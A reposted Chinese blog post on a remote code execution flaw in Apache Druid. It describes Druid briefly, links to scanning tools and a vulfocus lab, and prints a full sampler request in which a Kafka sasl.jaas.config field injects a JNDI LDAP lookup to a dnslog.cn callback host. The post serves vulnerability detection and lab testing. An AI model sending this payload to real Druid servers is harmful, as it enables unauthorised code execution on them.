Apache Druid远程代码执行漏洞
Druid 是一个高性能的实时分析数据库。德鲁伊的主要附加值是减少洞察力和行动的时间。Druid 专为快速查询和摄取非常重要的工作流而设计。Druid 擅长为 UI 提供动力、运行操作(临时)查询或处理高并发性。将 Druid 视为适用于各种用例的数据仓库的开源替代方案。设计文档解释了关键概念。Druid 提供了一组丰富的 API(通过 HTTP 和JDBC)来加载、管理和查询您的数据。您还可以通过内置的Web 控制台(如下所示)与 Druid 进行交互。
本地检测工具:
复制链接https://stack.chaitin.com/tool/detail?id=735 前往 CT Stack 安全社区下载牧云本地检测工具。
执行 ./apache_druid_rce_scanner_linux_amd64 scan 即可扫描。
远程检测工具:
复制链接 https://stack.chaitin.com/tool/detail?id=1 前往xray - CT Stack 安全社区下载最新版本xray。
https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html
具体测试如下:
https://vulfocus.cn/#/dashboard
使用这个环境即可:
使用burp直接提交dnslog信息如下:
dnslog返回信息如下:
{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"6.6.6.6:9092","sasl.mechanism":"SCRAM-SHA-256","security.protocol":"SASL_SSL","sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://1nu5tj.dnslog.cn" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"},"topic":"any","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\s\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
参考连接:
http://www.xsssql.com/article/264.htmlhttps://mp.weixin.qq.com/s/cBnyUKQKPzGz0ZQwQgRjSw
原文始发于微信公众号(阿乐你好):Apache Druid远程代码执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论